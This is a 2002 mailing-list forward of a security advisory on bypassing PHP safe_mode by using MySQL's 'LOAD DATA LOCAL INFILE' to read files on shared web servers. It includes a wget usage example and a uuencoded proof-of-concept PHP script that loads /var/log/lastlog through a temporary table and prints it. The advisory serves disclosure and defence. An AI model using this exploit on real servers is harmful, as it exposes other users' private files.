[Plug-security] [Fwd: PHP Safe Mode Filesystem Circumvention Problem]

Rusty Carruth Plug watcher plug-security@lists.PLUG.phoenix.az.us
Tue, 5 Feb 2002 13:55:00 -0700 (MST) 

(there, that's the right list now) 

> -------- Original Message --------
> Subject: PHP Safe Mode Filesystem Circumvention Problem
> From: Dave Wilson <dw@dahomelands.net>
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> 
> ------------------------------------------------------------------------------
> 
>                          Security Advisory DW020203-PHP
>                            Release: 3rd February 2002
> 
>                  PHP Safe Mode Filesystem Circumvention Problem
> 
>  Severity:   Medium to high.
>  Affects:    PHP, all versions which include safe_mode feature.
>  Platform:   UNIX, Microsoft Windows, any platforms on which PHP is
> available.
>  Vendor:     http://php.net.
>  Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
>              PHP 4.1.0 & Apache 2 on Linux.
> 
> 
> ------------------------------------------------------------------------------
> 
> 
> VULNERABILITY IN BRIEF
> 
>    PHP (since version 3?) includes a commonly used feature known as Safe
> Mode.
>    When enabled, scripts are highly limited in their ability to access
> or
>    execute local files, among other things.
> 
>    PHP relies on a wrapper function around all filesystem calls to
> perform
>    access checks, but unforunately the bundled MySQL client library has
> not
>    been modified to perform such checks on "LOAD DATA INFILE LOCAL"
> statements.
> 
>    If an attacker has access to a MySQL server (either provided by you
> or
>    himself), he can use it as a proxy by which to download files
> residing on
>    the safe_mode-enabled web server. For large ISPs relying on this
> feature
>    for individual customer privacy, it could mean clients accessing each
>    other's files, or viewing of files on an improperly secured server.
> 
> 
> FIX
> 
>    Currently, no fix exists. You may use other PHP safe_mode functions
> to
>    disable the use of the MySQL client library, or secure your servers
> in a
>    proper fashion.. A suggested fix for the PHP developers might be to
> scan
>    mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE".
> 
>    Happy hackers out there might like to look at libmysql.c:1764 if
> interested
>    in fixing this problem, although that may only be possible from
> within PHP.
> 
> 
> EXAMPLE
> 
>    The attached script will (once configured correctly) attempt to read
>    "/var/log/lastlog" via the SQL daemon and return it to the client.
> 
>    $ cp safe_mode.php /www
>    $ wget -qO lastlog_via_mysql localhost/safe_mode.php
>    $ diff /var/log/lastlog lastlog_via_mysql; echo $?
>    0
> 
> 
> COMMENTS
> 
>    Due to the nature of the PHP project, development is very rapid and
> hence
>    many sites do not keep up with latest PHP versions. If a fix was
> available,
>    it would take quite a while to propagate.
> 
>    It is likely that this is not an isolated problem in PHP, my bets are
> on
>    PostgreSQL and other PHP database extensions missing this one too.
> 
>    The MySQL support has been enabled in PHP by default for as long as I
> can
>    remember.
> 
> 
> DAVE WILSON
> 
>    Currently residing in Belfast, Northern Ireland, he is available for
> work
>    relating to network security auditing, post-attack recovery and
> forensics,
>    and penetration testing. He may be contacted at <dw@dahomelands.net>.
> If
>    you have any comments regarding this advisory, please contact him
> directly.
> 
> 
> Sun Feb  3 21:23:03 GMT 2002 -dw
> 
> 
> begin 644 safe_mode.php
> M/#\*"B\J"B`@(%!(4"!3869E($UO9&4@4')O8FQE;0H*("`@5&AI<R!S8W)I
> M<'0@=VEL;"!C;VYN96-T('1O(&$@9&%T86)A<V4@<V5R=F5R(')U;FYI;F<@
> M;&]C86QL>2!O<B!O=&AE<G=I<V4L"B`@(&-R96%T92!A('1E;7!O<F%R>2!T
> M86)L92!W:71H(&]N92!C;VQU;6XL('5S92!T:&4@3$]!1"!$051!('-T871E
> M;65N="!T;PH@("!R96%D(&$@*'!O<W-I8FQY(&)I;F%R>2D@9FEL92P@=&AE
> M;B!R96%D<R!I="!B86-K('1O('1H92!C;&EE;G0N"@H@("!!;GD@='EP92!O
> M9B!F:6QE(&UA>2!P87-S('1H<F]U9V@@=&AI<R`G<')O>'DG+B!!;'1H;W5G
> M:"!U;G)E;&%T960L('1H:7,*("`@;6%Y(&%L<V\@8F4@=7-E9"!T;R!A8V-E
> M<W,@9FEL97,@;VX@=&AE($1"('-E<G9E<B`H86QT:&]U9V@@=&AE>2!M=7-T
> M(&)E"B`@('=O<FQD+7)E861A8FQE(&]R(&EN($UY4U%,9"=S(&)A<V5D:7(L
> M(&%C8V]R9&EN9R!T;R!D;V-S*2X**B\*"@HD:&]S="`]("=L;V-A;&AO<W0G
> M.PHD=7-E<B`]("=R;V]T)SL*)'!A<W,@/2`G;&5T;65I;B<["B1D8B`@(#T@
> M)W1E<W1?9&%T86)A<V4G.PH*)&9I;&5N86UE(#T@)R]V87(O;&]G+VQA<W1L
> M;V<G.R`@("`@+RH@1FEL92!T;R!G<F%B(&9R;VT@6VQO8V%L72!S97)V97(@
> M*B\*)&QO8V%L(#T@=')U93L@("`@("`@("`@("`@("`@("`@("`@+RH@4F5A
> M9"!F<F]M(&QO8V%L(&9I;&5S>7-T96T@*B\*"@HD;&]C86P@/2`D;&]C86P@
> M/R`G3$]#04PG(#H@)R<["@HD<W%L(#T@87)R87D@*`H@("`B55-%("1D8B(L
> M"@H@("`G0U)%051%(%1%35!/4D%262!404),12`G("X@*"1T8FP@/2`G02<N
> M=&EM92`H*2D@+B`G("AA($Q/3D="3$]"*2<L"@H@("`B3$]!1"!$051!("1L
> M;V-A;"!)3D9)3$4@)R1F:6QE;F%M92<@24Y43R!404),12`D=&)L($9)14Q$
> M4R`B"B`@("X@(E1%4DU)3D%4140@0ED@("`@("`@)U]?5$A)4U].159%4E](
> M05!014Y37U\G("(*("`@+B`B15-#05!%1"!"62`@("`@("`@("`G)R`B"B`@
> M("X@(DQ)3D53(%1%4DU)3D%4140@0ED@)U]?5$A)4U].159%4E](05!014Y3
> M7U\G(BP*"B`@(")314Q%0U0@82!&4D]-("1T8FP@3$E-250@,2(**3L*"DAE
> M861E<B`H)T-O;G1E;G0M='EP93H@=&5X="]P;&%I;B<I.PH*;7ES<6Q?8V]N
> M;F5C="`H)&AO<W0L("1U<V5R+"`D<&%S<RD["@IF;W)E86-H("@D<W%L(&%S
> M("1S=&%T96UE;G0I('L*("`@)'$@/2!M>7-Q;%]Q=65R>2`H)'-T871E;65N
> M="D["@H@("!I9B`H)'$@/3T@9F%L<V4I(&1I92`H"B`@("`@(")&04E,140Z
> M("(@+B`D<W1A=&5M96YT("X@(EQN(B`N"B`@("`@(")214%33TXZ("(@+B!M
> M>7-Q;%]E<G)O<B`H*2`N(")<;B(*("`@*3L*"B`@(&EF("@A("1R(#T@0&UY
> M<W%L7V9E=&-H7V%R<F%Y("@D<2P@35E344Q?3E5-*2D@8V]N=&EN=64["@H@
> L("!E8VAO("1R(%LP73L*("`@;7ES<6Q?9G)E95]R97-U;'0@*"1Q*3L*?0H`
> `
> end
> -----BEGIN PGP SIGNATURE-----
> 
> iEYEARECAAYFAjxds+sACgkQs0ye6vw1XQFp4ACgktwtq2IXVxhY1gXOSfmnRpa5
> MBMAnjqqAm/KKS0A4EzaRTa7fpdCAbk7
> =DP/f
> -----END PGP SIGNATURE-----
> 
> <<  End forwarded message
> 
>